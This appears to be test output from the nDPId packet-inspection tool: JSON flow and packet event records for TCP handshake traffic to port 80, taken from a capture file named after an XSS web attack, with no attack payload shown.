+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5089,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347445158,"flow_last_seen":1499347450735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347576923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57264,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5089,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347446419,"flow_last_seen":1499347451735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347576923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57278,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5089,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347446419,"flow_last_seen":1499347451735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347576923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57278,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5089,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347447671,"flow_last_seen":1499347452736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347576923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57292,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5089,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347447671,"flow_last_seen":1499347452736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347576923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57292,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5089,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347450180,"flow_last_seen":1499347455736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347576923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57318,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5089,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347450180,"flow_last_seen":1499347455736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347576923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57318,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5089,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347451427,"flow_last_seen":1499347456736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347576923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57332,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5089,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347451427,"flow_last_seen":1499347456736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347576923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57332,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5092,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":360,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347578164,"flow_last_seen":1499347578164,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347578164,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58690,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5092,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":360,"flow_packet_id":1,"flow_last_seen":1499347578164,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347578164,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86A1AAD4G3cKsEAABwKgKMuVCAFCbVdQUAAAAAKACchDMsgAAAgQFtAQCCAoBOzwZAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5093,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":360,"flow_packet_id":2,"flow_last_seen":1499347578164,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347578164,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5UJIGXyrm1XUFaAScSD3WQAAAgQFtAQCCAoD5Q2OATs8GQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5095,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":360,"flow_packet_id":3,"flow_last_seen":1499347578165,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347578165,"pkt":"ABm5CmnxAMGxFOsxCABFAAA06A5AAD4G3cmsEAABwKgKMuVCAFCbVdQVSBl8rIAQAOWWYQAAAQEICgE7PBkD5Q2O"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5104,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":361,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347579405,"flow_last_seen":1499347579405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347579405,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58704,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5104,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":361,"flow_packet_id":1,"flow_last_seen":1499347579405,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347579405,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8mitAAD4GK6WsEAABwKgKMuVQAFAuJKdkAAAAAKACchBlUAAAAgQFtAQCCAoBOz1PAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5105,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":361,"flow_packet_id":2,"flow_last_seen":1499347579406,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347579406,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5VD8Ip+YLiSnZaAScSC3ygAAAgQFtAQCCAoD5Q7EATs9TwEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5106,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":361,"flow_packet_id":3,"flow_last_seen":1499347579406,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347579406,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0mixAAD4GK6ysEAABwKgKMuVQAFAuJKdl\/CKfmYAQAOVW0gAAAQEICgE7PU8D5Q7E"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5117,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":362,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347580693,"flow_last_seen":1499347580693,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347580693,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58718,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5117,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":362,"flow_packet_id":1,"flow_last_seen":1499347580693,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347580693,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Ma5AAD4GlCKsEAABwKgKMuVeAFCEtA8\/AAAAAKACchCllQAAAgQFtAQCCAoBOz6RAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5118,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":362,"flow_packet_id":2,"flow_last_seen":1499347580694,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347580694,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5V5F9x9ShLQPQKAScSAtQAAAAgQFtAQCCAoD5RAGATs+kQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5120,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":362,"flow_packet_id":3,"flow_last_seen":1499347580694,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347580694,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Ma9AAD4GlCmsEAABwKgKMuVeAFCEtA9ARfcfU4AQAOXMRwAAAQEICgE7PpED5RAG"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5137,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":363,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347583209,"flow_last_seen":1499347583209,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347583209,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58744,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5137,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":363,"flow_packet_id":1,"flow_last_seen":1499347583209,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347583209,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8hK5AAD4GQSKsEAABwKgKMuV4AFAxSsWoAAAAAKACchBABwAAAgQFtAQCCAoBO0EGAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5138,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":363,"flow_packet_id":2,"flow_last_seen":1499347583209,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347583209,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5XgjIturMUrFqaAScSAruAAAAgQFtAQCCAoD5RJ7ATtBBgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5139,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":363,"flow_packet_id":3,"flow_last_seen":1499347583211,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347583211,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0hK9AAD4GQSmsEAABwKgKMuV4AFAxSsWpIyLbrIAQAOXKvgAAAQEICgE7QQcD5RJ7"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5150,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":364,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347584472,"flow_last_seen":1499347584472,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347584472,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58758,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5150,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":364,"flow_packet_id":1,"flow_last_seen":1499347584472,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347584472,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8XXVAAD4GaFusEAABwKgKMuWGAFAsKR83AAAAAKACchDqTwAAAgQFtAQCCAoBO0JCAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5151,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":364,"flow_packet_id":2,"flow_last_seen":1499347584472,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347584472,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5YYTf0ohLCkfOKAScSB18gAAAgQFtAQCCAoD5RO3ATtCQgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5152,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":364,"flow_packet_id":3,"flow_last_seen":1499347584473,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347584473,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0XXZAAD4GaGKsEAABwKgKMuWGAFAsKR84E39KIoAQAOUU+gAAAQEICgE7QkID5RO3"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5162,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":365,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347585744,"flow_last_seen":1499347585744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347585744,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58772,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5162,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":365,"flow_packet_id":1,"flow_last_seen":1499347585744,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347585744,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8CJdAAD4GvTmsEAABwKgKMuWUAFD9vEsXAAAAAKACchDrjwAAAgQFtAQCCAoBO0OAAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5163,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":365,"flow_packet_id":2,"flow_last_seen":1499347585745,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347585745,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5ZQRxaCL\/bxLGKAScSAhRAAAAgQFtAQCCAoD5RT1ATtDgAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5165,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":365,"flow_packet_id":3,"flow_last_seen":1499347585746,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347585746,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0CJhAAD4GvUCsEAABwKgKMuWUAFD9vEsYEcWgjIAQAOXASwAAAQEICgE7Q4AD5RT1"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5177,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347452731,"flow_last_seen":1499347457736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347586996,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57346,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5177,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347452731,"flow_last_seen":1499347457736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347586996,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57346,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5177,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347455224,"flow_last_seen":1499347460737,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347586996,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57372,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5177,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347455224,"flow_last_seen":1499347460737,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347586996,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57372,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5177,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347456462,"flow_last_seen":1499347461738,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347586996,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57386,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5177,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347456462,"flow_last_seen":1499347461738,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347586996,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57386,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5177,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347457705,"flow_last_seen":1499347462738,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347586996,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57400,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5177,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347457705,"flow_last_seen":1499347462738,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347586996,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57400,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5177,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347460253,"flow_last_seen":1499347465739,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347586996,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57426,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5177,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347460253,"flow_last_seen":1499347465739,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347586996,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57426,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5177,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347461508,"flow_last_seen":1499347466739,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347586996,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57440,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5177,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347461508,"flow_last_seen":1499347466739,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347586996,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57440,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5180,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":366,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347588270,"flow_last_seen":1499347588270,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347588270,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58798,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 